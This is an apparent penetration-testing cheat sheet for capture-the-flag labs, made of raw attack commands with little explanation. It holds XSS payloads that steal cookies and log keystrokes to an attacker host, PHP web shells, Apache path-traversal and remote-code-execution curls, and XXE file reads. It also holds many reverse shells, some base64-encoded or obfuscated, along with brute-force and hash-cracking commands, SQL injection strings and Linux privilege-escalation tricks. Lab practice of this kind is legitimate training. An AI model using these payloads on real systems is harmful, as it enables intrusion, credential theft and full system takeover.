ip=10.10.10.10
nmap -sC -sV $ip
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
gobuster dir -t 20 -x php,txt,html -w /usr/share/wordlists/dirb/common.txt -u http://$ip/
wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://domain.ltd/" -H "Host: FUZZ.domain.ltd" --hl 1
with gobuster
gobuster vhost -u example.com -w /usr/share/amass/wordlists/subdomains.lst | grep "Status: 200" | cut -d " " -f 2
hydra -I -l username -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/:username=^USER^&password=^PASS^:F=bad username"
Prepare wordlist for 8 symbols
egrep '^.{8}$' /usr/share/wordlists/rockyou.txt > small.txt
hydra -l admin -P small.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
wpscan --url http://example.com -P /usr/share/wordlists/rockyou.txt -U username.txt -t 75
php://filter/convert.base64-encode/resource=index.php
backdoor shell.php
<?php
if (isset($_REQUEST['cmd'])) {
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
php serialisation problem if we have _destruct() and unserialize() funciotions
<?php
class FormSubmit
{
public $form_file = 'shell.php';
public $message = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.9.58.3/1234 0>&1\'");';
}
print urlencode(serialize(new FormSubmit));
?>
Apache 2.4.49 without CGI:
curl "http://10.10.138.215:8080//cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/flag.txt"
Apache 2.4.49 with CGI
curl "http://10.10.138.215:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash" -d 'echo Content-Type: text/plain; echo; cat /flag.txt' -H "Content-Type: text/plain"
Apache 2.4.50 without CGI:
curl 'http://10.10.138.215:8082/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/flag.txt'
Apache 2.4.50 with CGI:
curl "http://10.10.138.215:8083/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash" -d 'echo Content-Type: text/plain; echo; wget http://10.9.58.3:8000/shell.sh' -H "Content-Type: text/plain"
#injection
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ELEMENT search ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<name>
hello &xxe;
</name><search>
&xxe;</search></root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ELEMENT search ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root>
<name>
hello &xxe;
</name><search>
&xxe;</search></root>
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat
python3 -m http.server
powershell -c "Invoke-WebRequest -Uri 'http://10.9.58.3:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
cd C:\Windows\Temp\
winPEAS.bat
powershell -c "Invoke-WebRequest -Uri 'http://10.9.58.3:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
ssh -L 6969:localhost:8080 username@remote.host
socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22
Download socat
wget -q http://10.9.58.3:8000/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.9.58.3:4444
Proxy chain
ssh -D 9050 -q -C -N -f user@host
proxychains4 nmap -Pn localhost
List shares
smbclient -L \\\\$ip\\
Connect to share
smbclient \\\\addres\\share -U username
ftp -i $ip
anonymous
binary
passive off
# Start Web Server
python3 -m http.server
## Inject XSS On vuln Web App
<script>window.location = 'http://10.9.58.3:8000/?param=' + document.cookie </script>
OR
PoC
<script>alert('XSS');</script>
Session Stealing:
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
Key Logger:
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
Usually there is web and ssh ports openned. Let's scan web directories with gobuster.
bash -i >& /dev/tcp/10.9.58.3/12345 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.58.3 1234 >/tmp/f
mkfifo /tmp/qvfuzlx; nc 10.9.58.3 4444 0</tmp/qvfuzlx | /bin/sh >/tmp/qvfuzlx 2>&1; rm /tmp/qvfuzlx
# 12345
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjU4LjMvMTIzNDUgMD4mMQo= | base64 -d | bash
bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.58.3%2F12345%200%3E%261
nc${IFS}10.9.58.3${IFS}12345${IFS}-e${IFS}/bin/sh
awk 'BEGIN {s = "/inet/tcp/0/10.9.58.3/1234"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')
exiftool -Comment="<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>"
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAgICAsc3VicHJvY2VzcyAgICAgICAsb3MgICAgICA7aG9zdD0iMTAuOS41OC4zIiAgICAgIDtwb3J0PTEyMzQ1ICAgICAgO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgICAsc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgIDtzLmNvbm5lY3QoKGhvc3QgICAgICAgLHBvcnQpKSAgICAgIDtvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLDApICAgICAgO29zLmR1cDIocy5maWxlbm8oKSAgICAgICAsMSkgICAgICA7b3MuZHVwMihzLmZpbGVubygpICAgICAgICwyKSAgICAgIDtwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=')[0]))"
__import__('os').system('/bin/bash')
echo "import os" > /tmp/module.py
echo "os.system('/bin/bash')" >> /tmp/module.py
sudo PYTHONPATH=/tmp /usr/bin/python /scripts/Script.py
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.58.3 LPORT=9001 -f exe -o shell.exe
while true; do sleep 5 && mknod /dev/shm/p p; cat /dev/shm/p | /bin/bash -i | nc 127.0.0.1 9001 >/dev/shm/p; done
(ALL) /usr/local/bin/less
echo 'bash -i >& /dev/tcp/10.9.58.3/12345 0>&1' >> /usr/local/bin/less
sudo /usr/local/bin/less
PHP
"<?php system($_GET['cmd']);?>"
"<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.9.58.3/12345 0>&1'\"); ?>"
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.58.3 1234 >/tmp/f') ?>
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
stty raw -echo
fg
export TERM=xterm
use exploit/unix/webapp/wp_admin_shell_upload
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp](More Reverse Shells)
set WPCHECK false
set HttpClientTimeout 300
ssh2john.py id_rsa > ssh.key
john ssh.key # or
john ssh.key -w=/usr/share/wordlists/rockyou.txt
Linux shadow file
hashcat -m 1800 -a0 hash.txt /usr/share/wordlists/rockyou.txt -O
zip file
fcrackzip backup.zip -v -u -D -p /usr/share/wordlists/rockyou.txt
curl linuxenum.savenas.lt -sL | bash
find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -name user.txt 2>/dev/null
find / -regextype posix-extended -regex './(flag*|root|user)\.txt$' -exec cat {} \; 2> /dev/null
find / -name id_rsa 2> /dev/null
getcap -r / 2> /dev/null
cat /etc/crontab
sudo -l
sudo -u#-1 /bin/bash #if (ALL, !root) NOPASSWD: /bin/bash
#NFS
ssh -fNv -L 2049:localhost:2049 john@10.10.10.1
sudo mount -t nfs localhost:/var/nfs nfs/
mkdir nfs && cd nfs
sudo cp /bin/sh .
chmod +s sh
if getcaps are:
###python
python: exit_code = os.system(‘/bin/sh’) output = os.popen(‘/bin/sh’).read()
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
/bin/tar = cap_dac_read_search+ep
tar -cvf root.tar /root/root.txt
tar -xvf root.tar
echo /bin/bash > /tmp/date && chmod +x /tmp/date
export PATH=/tmp:$PATH
/tmp/bash -p
echo 'echo "user ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "" > "--checkpoint-action=exec=sh privesc.sh"
echo "" > --checkpoint=1
Wait 1 minute for the Bash script to execute.
Docker
docker run --privileged -v /root/.ssh/:/root -ti image /bin/bash
or
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
LXC
Download an image:
lxc image import ./alpine-v3.12-i686-20200831_2036.tar.gz --alias alpine
lxc init alpine ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
cd /mnt/root/root/
if you're getting message
Failed container creation: No storage pool found. Please create a new storage pool.
need to initialise storage with
lxd init
curl https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -s | bash
gcc -pthread dirtycow/c0w.c -o c0w
mkdir /tmp/1
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/x
MySQL
0 UNION ALL SELECT group_concat(column_name),null,null,null,null FROM information_schema.columns WHERE table_name="users"
Demon on https://sqliteonline.com
Check the tables
SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
Start-Process powershell 'Start-Process cmd -Verb RunAs' -Credential administrator
result is demo List columns
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='demo'
') UNION SELECT NULL, NULL, NULL,NULL -- -
or
') union select 1,2,3,4 --
then
') union select 1,2,3,group_concat(tbl_name) from sqlite_master where type='table' and tbl_name not like 'sqlite_%' --
and then
') union select 1,2,3,group_concat(password) from users --